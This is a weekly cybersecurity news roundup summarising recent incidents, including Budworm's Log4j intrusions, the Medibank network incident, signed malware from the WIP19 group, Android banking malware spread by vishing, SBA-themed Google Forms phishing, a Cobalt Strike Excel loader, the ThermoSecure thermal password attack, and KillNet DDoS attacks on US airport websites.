Taking cybercriminals lightly is no longer an option with the evolving threat landscape. One needs to be aware of what they are up to, to avoid becoming their victim. To that end, here are this week’s phishing and data breach headlines.
Budworm Espionage Group Returns And Targets The US Organizations
The Budworm group is famous for mounting attacks against high-value targets. While there were standard reports of Budworm targeting US enterprises six to eight years ago, recent years saw the group’s activity primarily focused on Asia, the Middle East, and Europe. However, it is the second time in recent months that Budworm made news for a malicious campaign against a U.S-based target. A CISA report on multiple APT groups targeting a defense sector organization included Budworm’s toolset. Resuming attacks against US based targets can signal to change in focus for the group.
According to the report, Budworm compromised the Apache Tomcat service on the servers by leveraging Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105) and installing web shells. The threat actors used Virtual Private Servers (VPS) hosted on Telstra and Vultr as command-and-control (C&C) servers.
Budworm continues to use the HyperBro malware family as a payload, often loaded using the dynamic-link library (DLL) side-loading technique.
- It involves the cybercriminals placing a malicious DLL in a directory where they expect a legitimate DLL might get found.
- Then, the attacker runs the legitimate application (installed by themselves).
- The legitimate application loads and executes the payload.
Australia’s Medibank: Shares Trading Halts as the Health Insurer Reports Cyber Incident
Medibank Private (MPL.AX), the Australian health insurer, recently said that it detected unusual activity on its network and will remove and restrict access to specific customer-facing systems. The health insurer explained in a statement that it took immediate steps to minimize the impact of the incident and engaged special cybersecurity firms. It added that no evidence suggested hackers accessing sensitive data, including customer data.
The incident follows a breach at Optus, Australia’s top telecoms provider, late last month, in which data of about 10 million customers got compromised, triggering an overhaul of Australian consumer privacy rules to include targeted data sharing between banks and telecommunication firms.
Medibank said that isolating several customer-facing systems will reduce the likelihood of data loss or damage to systems.
“As a result, our Australian Health Management (AHM) and international student policy management systems are offline. We expect they will be offline for most of the day,” the health insurer mentioned in the statement. Medibank shares went into a trading halt pending the cyber incident announcement, and it confirmed it would remain closed for trading as the investigation progresses.
New Chinese APT Targets Telcos and IT Service Providers With Signed Malware
SentinelLabs is monitoring a threat cluster tracked as WIP19, a group that distinguishes itself by using legitimate, stolen digital certificates issued by a firm called “DEEPSoft”. Based on the investigations, WIP19 targeted IT and telecommunications service providers in Asia and the Middle East.
Throughout the activity, cybercriminals abused the certificate and signed several malicious components. Furthermore, they performed almost all operations using a “hands-on keyboard” fashion when interacting with the compromised machines. It means the threat actors gave up on a stable C2 server in exchange for stealth.
The researchers analyzed the utilized backdoors, along with pivoting on the certificate, which suggests WinEggDrop, a renowned Chinese-speaking malware author, created some of the components used by the attackers. The author created tools for numerous groups in the past and has been active since 2014.
Using stolen certificates, WinEggDrop-authored malware and correlating TTPs indicate possible links of the attackers with Operation Shadow Force. Since the toolset appears to be shared among various actors, it is unclear whether it is “Shadow Force’s” new iteration or a different actor utilizing similar TTPs.
Hackers Used Vishing and Tricked Victims into Installing Android Banking Malware
Malicious actors are using voice phishing (vishing) tactics and luring users into installing Android malware on their mobiles, according to new research from ThreatFabric. The Dutch mobile security firm identified a phishing website network targeting Italian online-banking users, designed to steal their contact details.
The social engineering technique of TOAD, or Telephone-oriented attack delivery, involves calling the victims using previously compromised information from fraudulent websites. The caller, purporting to be a bank’s support agent, instructs the user on the other end to install a security app. The unsuspecting user grants it extensive permissions, but the app is malicious software designed to gain remote access or initiate financial fraud.
In the above case, hackers deploy an Android malware called Copybara, a mobile trojan first detected in 2021, and perform on-device fraud through overlay attacks targeting Italian users. “Such attacks need more resources from the threat actors’ side and are sophisticated to perform and maintain,” the ThreatFabric Mobile Threat Intelligence (MTI) team said.
New COVID-19 Phishing Wave Abuses Google Forms
New COVID-19-themed phishing messages are again spiking in the US after a prolonged summer hiatus. According to a report by the email security provider INKY, the malspam volumes doubled in September compared to the previous months and can rise even more.
In the latest campaign, phishing emails impersonate the US SBA (Small Business Administration) and abuse Google Forms to host phishing pages that attempt to steal the personal details of business owners. The SBA launched COVID-19 financial recovery programs earlier, and attackers are leveraging it to add legitimacy to the campaign, especially for past beneficiaries.
How the attack progresses:
- The threat actors use lures in the phishing emails showing it is for pandemic financial support initiatives like the “COVID Economic Injury Disaster Loan,” “Paycheck Protection Program,” and “Revitalization Fund.”
- The emails entice victims to click on an embedded link and apply for the program. The link redirects them to a Google Forms page.
- Abusing form builders is a popular tactic among hackers, who exploit the encrypted data traffic, free hosting, and brand trustworthiness and recognition that come with them.
- The phishing forms disguise the content used by SBA in legitimate support programs, requesting the victims to enter the same information.
- It includes their Google account credentials, State ID and driver’s license details, SSNs, EINs, and bank account numbers.
- If the user clicks on “Submit,” the hackers receive the data while reassuring the victims by displaying a “Your response is recorded” message.
Ukrainian Military-Themed Excel File Delivers Multi-Stage Cobalt Strike Loade
FortiGuard Labs recently observed a rising number of campaigns targeting both parties in the ongoing Russian-Ukrainian conflict. It can be a cyber element to the war or opportunistic cybercriminals taking advantage of the conflict to further their malicious objectives.
Recently, researchers discovered a malicious Excel document designed as a tool to calculate the salaries of Ukrainian military personnel. The document, when triggered, executes evasive multi-stage loaders, ultimately leading to Cobalt Strike Beacon malware getting loaded onto the victim’s device.
The campaign starts with the attacker delivering an Excel file containing malicious macro code (XLSM). The file looks like a spreadsheet tool used for generating the salaries of Ukrainian military personnel. Eventually, the document attempts to trick the victim into enabling the execution of macros and auto-populate the cell content.
A Newly Developed ‘Thermal Attack’ Can Guess Your Password by Examining the Heat of Your Fingertips
Computer security researchers have developed an AI-driven system capable of guessing smartphone and computer passwords in seconds. It examines the heat signatures that the user’s fingertips leave on screens and keyboards when entering data.
Named ThermoSecure, the University of Glasgow’s School of Computing Science researchers developed the system demonstrating how the thermal-imaging cameras’ falling price and the evolution of artificial intelligence (AI) and machine-learning algorithms are creating new avenues for thermal attacks.
By using a thermal-imaging camera to analyze a smartphone screen, computer keyboard, or ATM keypad, one can take a picture revealing the recent heat signature from fingertips touching the device. The brighter the area in the thermal image, the more recently someone touched it. The University of Glasgow has earlier researched thermal attacks suggesting how inexperienced attackers can guess passwords by looking at the thermal images. By adding AI-ML technologies, they can crack passwords faster.
Pro-Russian hackers take down US airports’ sites in DDoS attacks.
The pro-Russian group ‘KillNet’ recently claimed large-scale DDoS (distributed denial-of-service) attacks against several major airports’ websites in the US, making them inaccessible. The DDoS attacks overwhelmed the servers hosting the websites with garbage requests, preventing travelers from connecting and booking airport services or getting updates about their scheduled flights.
Notable examples of airport websites that went offline include the Los Angeles International Airport (LAX) ( intermittently offline or slow to respond) and Hartsfield-Jackson Atlanta International Airport (ATL). Other airports giving database connection errors included Orlando International Airport (MCO), Chicago O’Hare International Airport (ORD), Denver International Airport (DIA), and Phoenix Sky Harbor International Airport (PHX), including some airports in Kentucky, Mississippi, and Hawaii.
In the above case, the DDoS attacks did not impact flights. Still, they had an adverse effect on the functioning of a crucial economic sector, threatening to delay or disrupt associated services.